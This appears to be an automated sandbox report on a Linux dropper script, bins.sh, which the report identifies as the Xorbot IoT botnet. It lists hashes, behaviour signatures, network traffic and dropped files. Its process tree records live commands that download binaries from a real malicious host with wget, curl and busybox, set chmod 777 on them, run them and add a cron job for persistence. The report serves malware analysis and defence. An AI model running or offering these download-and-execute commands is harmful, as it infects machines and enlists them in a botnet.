Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28/02/2025, 11:57 UTC

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1c04224c31369b92267e0f914de6faa7

  • SHA1

    a83724c5b8610fae0d070df43be47b501af8c44b

  • SHA256

    27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f

  • SHA512

    f84f0a3d4f25e30aa0b396a8212e44194c1787f5af184c2a20ded76d3b1dc36e52a38c1c8c16ea6d5263807375dbc8fdfc92de6b4f116b68f16650655288b542

  • SSDEEP

    96:YjvjDjZLwsIL8AjnqinuOCaELKCsHA82U99vLv+vuvBGjm9gcSLwsFQMuBSBqBqs:S4H7qAKosvdGrDIF4

Malware Config

Signatures

  • Detects Xorbot 3 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 13 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1510
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1511
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1512
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1516
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1518
      • /bin/chmod
        chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        ./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
          PID:1520
        • /bin/rm
          rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
          2⤵
            PID:1522
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1523
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1524
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1526
          • /bin/chmod
            chmod 777 tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • File and Directory Permissions Modification
            PID:1527
          • /tmp/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            ./tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
              PID:1528
            • /bin/rm
              rm tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
              2⤵
                PID:1530
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1531
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1532
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1534
              • /bin/chmod
                chmod 777 j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • File and Directory Permissions Modification
                PID:1535
              • /tmp/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                ./j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                  PID:1536
                • /bin/rm
                  rm j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                  2⤵
                    PID:1538
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1539
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1540
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1542
                  • /bin/chmod
                    chmod 777 jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1543
                  • /usr/bin/crontab
                    crontab -l
                    2⤵
                      PID:1547
                    • /usr/bin/crontab
                      crontab -
                      2⤵
                      • Creates/modifies Cron job
                      PID:1549
                    • /bin/rm
                      rm jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      2⤵
                        PID:1551
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/Lh2XFnF0IQ4hRp0Ecm8nGBqLKD7wLDvUo7
                        2⤵
                        • System Network Configuration Discovery
                        PID:1554

                    Network

                    • flag-au
                      DNS
                      conn.masjesu.zip
                      Remote address:
                      1.1.1.1:53
                      Request
                      conn.masjesu.zip
                      IN A
                      Response
                      conn.masjesu.zip
                      IN A
                      216.126.231.240
                      conn.masjesu.zip
                      IN A
                      37.44.238.88
                    • flag-au
                      DNS
                      conn.masjesu.zip
                      Remote address:
                      1.1.1.1:53
                      Request
                      conn.masjesu.zip
                      IN AAAA
                      Response
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:01 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 122566
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT
                      ETag: "67c18921-1dec6"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:02 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 122566
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT
                      ETag: "67c18921-1dec6"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:02 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 122566
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:01 GMT
                      ETag: "67c18921-1dec6"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:02 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 155208
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-25e48"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 155208
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-25e48"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 155208
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-25e48"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 125455
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-1ea0f"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 125455
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-1ea0f"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 125455
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:02 GMT
                      ETag: "67c18922-1ea0f"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN HTTP/1.1
                      User-Agent: Wget/1.19.4 (linux-gnu)
                      Accept: */*
                      Accept-Encoding: identity
                      Host: conn.masjesu.zip
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 101654
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:03 GMT
                      ETag: "67c18923-18d16"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: curl/7.58.0
                      Accept: */*
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 101654
                      Connection: keep-alive
                      Last-Modified: Fri, 28 Feb 2025 10:00:03 GMT
                      ETag: "67c18923-18d16"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • flag-fr
                      GET
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Remote address:
                      37.44.238.88:80
                      Request
                      GET /bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN HTTP/1.1
                      Host: conn.masjesu.zip
                      User-Agent: Wget
                      Connection: close
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.22.1
                      Date: Fri, 28 Feb 2025 11:58:05 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 101654
                      Connection: close
                      Last-Modified: Fri, 28 Feb 2025 10:00:03 GMT
                      ETag: "67c18923-18d16"
                      X-Cache-Status: HIT
                      Accept-Ranges: bytes
                    • 216.126.231.240:80
                      conn.masjesu.zip
                      180 B
                      3
                    • 185.125.188.61:443
                      tls
                      135 B
                      2
                    • 185.125.188.61:443
                      tls
                      135 B
                      2
                    • 151.101.193.91:443
                      tls, https
                      233 B
                      40 B
                      1
                      1
                    • 151.101.193.91:443
                      extensions.gnome.org
                      tls
                      976 B
                      5.8kB
                      12
                      14
                    • 195.181.164.14:443
                      tls, https
                      26.0kB
                      100
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      http
                      2.9kB
                      127.8kB
                      52
                      95

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      http
                      2.6kB
                      127.8kB
                      48
                      95

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      http
                      634 B
                      15.5kB
                      10
                      13

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      http
                      3.3kB
                      161.7kB
                      56
                      119

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      http
                      2.8kB
                      161.7kB
                      51
                      119

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      http
                      994 B
                      42.0kB
                      19
                      32

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      http
                      2.8kB
                      130.8kB
                      51
                      97

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      http
                      2.4kB
                      130.8kB
                      44
                      97

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      http
                      994 B
                      42.0kB
                      19
                      32

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      http
                      1.9kB
                      106.1kB
                      33
                      80

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      http
                      2.2kB
                      106.0kB
                      39
                      79

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      HTTP Response

                      200
                    • 37.44.238.88:80
                      http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      http
                      1.0kB
                      42.0kB
                      20
                      32

                      HTTP Request

                      GET http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      HTTP Response

                      200
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 37.44.238.88:80
                      conn.masjesu.zip
                      164 B
                      112 B
                      3
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      180 B
                      3
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      240 B
                      4
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      120 B
                      2
                    • 216.126.231.240:443
                      conn.masjesu.zip
                      180 B
                      3
                    • 1.1.1.1:53
                      conn.masjesu.zip
                      dns
                      73 B
                      105 B
                      1
                      1

                      DNS Request

                      conn.masjesu.zip

                      DNS Response

                      216.126.231.240
                      37.44.238.88

                    • 1.1.1.1:53
                      conn.masjesu.zip
                      dns
                      73 B
                      136 B
                      1
                      1

                      DNS Request

                      conn.masjesu.zip

                    • 224.0.0.251:5353
                      146 B
                      2

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      Filesize

                      119KB

                      MD5

                      1b166b95f9cb4b079ef1b9ec8363ddf3

                      SHA1

                      0d8eb08add467b3b5474f9b25909297fe7c2839c

                      SHA256

                      94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                      SHA512

                      983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                    • /tmp/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      Filesize

                      122KB

                      MD5

                      cd3d4b9c643e5b473fb4d88ed05f0716

                      SHA1

                      64ee7a97418583d759eaea8000890cc3bae1b5f4

                      SHA256

                      0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                      SHA512

                      164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                    • /tmp/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      Filesize

                      99KB

                      MD5

                      9438d9bc392bcf300a5583b6df5bc8f6

                      SHA1

                      375a6ae34b516f6f3eeea8030c4084f585017efa

                      SHA256

                      68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                      SHA512

                      1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                    • /tmp/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      Filesize

                      151KB

                      MD5

                      6c583043d91c55aa470c08c87058e917

                      SHA1

                      abf65a5b9bba69980278ad09356e53de8bb89439

                      SHA256

                      2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                      SHA512

                      82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                    • /var/spool/cron/crontabs/tmp.kxiaYZ

                      Filesize

                      210B

                      MD5

                      077a8703169311bb58b8dc6f3872b5ef

                      SHA1

                      1a6e0f3e16e1e21d753d4789d1058438379812f0

                      SHA256

                      8d9d7ac5f9b41925d157d40ada63636ac21e0bb928d26a64375924a65739201d

                      SHA512

                      75bf5d7195c1fb70981bb554dceb393ac32e59b25ef220dd02f5d4473c101bd6a06e2f847f51784188d87633e08ef045ee29933ef9738d603566c59bbd9ac7c3

                    We care about your privacy.

                    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.